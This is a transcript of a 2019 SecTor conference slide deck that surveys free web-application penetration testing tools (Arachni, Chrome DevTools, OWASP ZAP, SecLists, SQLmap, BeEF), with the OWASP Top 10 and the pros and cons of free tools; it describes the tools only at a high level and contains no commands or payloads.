the tools of a web application penetration tester · arachni •a feature-full, modular,...
TRANSCRIPT
![Page 1: The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators](https://reader033.vdocument.in/reader033/viewer/2022051917/6009339a82948126a14fe64d/html5/thumbnails/1.jpg)
The Tools of A Web
Application
Penetration Tester
Chuck Ben-Tzur CISSP, CISM, CRISC, PMP
October 10, 2019
SecTor 2019
![Page 2: The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators](https://reader033.vdocument.in/reader033/viewer/2022051917/6009339a82948126a14fe64d/html5/thumbnails/2.jpg)
Introduction
• A little about me…
• Provide an overview of some free and available tools that can be used
during a web application penetration test.
• Will be using the following:
• Custom PHP web application (www.dardaleh.com)
• Kali Linux (tools are NOT part of the distribution!)
• NOT Metasploit…
![Page 3: The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators](https://reader033.vdocument.in/reader033/viewer/2022051917/6009339a82948126a14fe64d/html5/thumbnails/3.jpg)
Disclaimer
• The views and opinions expressed in this session are based on MY
experience and testing methodology when using these tools.
• If you disagree, it is likely because…
• You worked on different applications/environment/technology stacks
• You used different testing methodology (different goals, approach)
• You used the tools wrong
![Page 4: The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators](https://reader033.vdocument.in/reader033/viewer/2022051917/6009339a82948126a14fe64d/html5/thumbnails/4.jpg)
User/Client Side Server/System Side
Web Application Testing
INPUT
OUTPUT
![Page 5: The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators](https://reader033.vdocument.in/reader033/viewer/2022051917/6009339a82948126a14fe64d/html5/thumbnails/5.jpg)
Penetration Test and OWASP top 10
OWASP top 10
• A1 - Injection
• A2 - Broken Authentication
• A3 - Sensitive Data Exposure
• A4 - XML External Entities (XXE)
• A5 - Broken Access Control
• A6 - Security Misconfiguration
• A7 - Cross-Site Scripting (XSS)
• A8 - Insecure Deserialization
• A9 - Using Components with Known Vulnerabilities
• A10 - Insufficient Logging & Monitoring
Reconnaissance
Enumeration
Vulnerability Analysis
Exploitation
Reporting
![Page 6: The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators](https://reader033.vdocument.in/reader033/viewer/2022051917/6009339a82948126a14fe64d/html5/thumbnails/6.jpg)
Arachni
• A feature-full, modular, high-performance Ruby framework aimed
towards helping penetration testers and administrators evaluate the
security of modern web applications.
• It is free, with its source code public and available for review.
source: https://www.arachni-scanner.com
![Page 7: The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators](https://reader033.vdocument.in/reader033/viewer/2022051917/6009339a82948126a14fe64d/html5/thumbnails/7.jpg)
Demo #1 (Arachni)
![Page 8: The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators](https://reader033.vdocument.in/reader033/viewer/2022051917/6009339a82948126a14fe64d/html5/thumbnails/8.jpg)
Developer Tools
• Chrome DevTools is a set of web developer tools built directly into
the Google Chrome browser.
• DevTools can help you edit pages on-the-fly and diagnose problems
quickly, which ultimately helps you build better websites, faster.
source: https://developers.google.com/web/tools/chrome-devtools
![Page 9: The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators](https://reader033.vdocument.in/reader033/viewer/2022051917/6009339a82948126a14fe64d/html5/thumbnails/9.jpg)
Demo #2 (Dev Tools)
![Page 10: The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators](https://reader033.vdocument.in/reader033/viewer/2022051917/6009339a82948126a14fe64d/html5/thumbnails/10.jpg)
OWASP ZAP
• OWASP (Open Web Application Security Project) ZAP (Zed Attack
Proxy) is an open-source web application security scanner.
• When used as a proxy server it allows the user to manipulate all of
the traffic that passes through it, including traffic using https.
source: https://en.wikipedia.org/wiki/OWASP_ZAP
![Page 11: The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators](https://reader033.vdocument.in/reader033/viewer/2022051917/6009339a82948126a14fe64d/html5/thumbnails/11.jpg)
Demo #3 (ZAP Proxy)
![Page 12: The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators](https://reader033.vdocument.in/reader033/viewer/2022051917/6009339a82948126a14fe64d/html5/thumbnails/12.jpg)
SecLists
• SecLists is a collection of multiple types of lists used during security
assessments, collected in one place. List types include usernames,
passwords, URLs, sensitive data patterns, fuzzing payloads, web
shells, and many more.
source: https://github.com/danielmiessler/SecLists
![Page 13: The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators](https://reader033.vdocument.in/reader033/viewer/2022051917/6009339a82948126a14fe64d/html5/thumbnails/13.jpg)
SecLists (cont.)
![Page 14: The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators](https://reader033.vdocument.in/reader033/viewer/2022051917/6009339a82948126a14fe64d/html5/thumbnails/14.jpg)
SQLmap
• A penetration testing tool that automates the process of detecting
and exploiting SQL injection flaws providing its user interface in the
terminal.
• In addition to mapping and detecting vulnerabilities, the software
enables access to the database, editing and deleting data, and
viewing data in tables.
source: https://en.wikipedia.org/wiki/Sqlmap
• Uses local storage to create a cache of the collected information.
![Page 15: The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators](https://reader033.vdocument.in/reader033/viewer/2022051917/6009339a82948126a14fe64d/html5/thumbnails/15.jpg)
Demo #4 (SQLmap)
![Page 16: The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators](https://reader033.vdocument.in/reader033/viewer/2022051917/6009339a82948126a14fe64d/html5/thumbnails/16.jpg)
BeEF
• BeEF (Browser Exploitation Framework).
• It is a penetration testing tool that focuses on the web browser
source: https://beefproject.com/
![Page 17: The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators](https://reader033.vdocument.in/reader033/viewer/2022051917/6009339a82948126a14fe64d/html5/thumbnails/17.jpg)
Demo #5 (BeEF)
![Page 18: The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators](https://reader033.vdocument.in/reader033/viewer/2022051917/6009339a82948126a14fe64d/html5/thumbnails/18.jpg)
Things to Consider (Pros)
• Perfect for training and one-time projects
• If running multiple tools - allows for results comparison
• Usually very small footprint (or ability to run without install)
• Most tool provide APIs and can be easily integrated with Continuous
Integration activities – great security value.
• Usually extensible – allowing other user to add/enhance functionality
• You can contribute directly and affect the product direction/functionality
• Can’t beat the price!
![Page 19: The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators](https://reader033.vdocument.in/reader033/viewer/2022051917/6009339a82948126a14fe64d/html5/thumbnails/19.jpg)
Things to Consider (Cons)
• No official ownership and support
• Little quality assurance (bugs, vulnerabilities) and response time
• No guarantee of regular updates (or may be completely abandoned)
• A little harder to use (e.g. library dependencies, command lines,
somewhat limited platforms)
• Limited reporting capabilities (e.g. customized reports)
• Malicious users and hackers have access to these too…
![Page 20: The Tools of A Web Application Penetration Tester · Arachni •A feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators](https://reader033.vdocument.in/reader033/viewer/2022051917/6009339a82948126a14fe64d/html5/thumbnails/20.jpg)
Final Thoughts
• These are tools to complement the follow-up (and manual) work:
• Elimination of False Positive findings (there is no SQL injection if there is no Database!)
• Actual penetration test (following up on the “low hanging fruits”)
• Perform threat modeling, assigning risks and reporting
• There are MORE tools out there (e.g. w3af, Nikto)
• Most tools will do more than one thing (scanning, exploiting, built-in payloads)
• There are some good commercial tools out there (free versions, supported, User Interface)
• Special thanks to Erich Samuel for his input…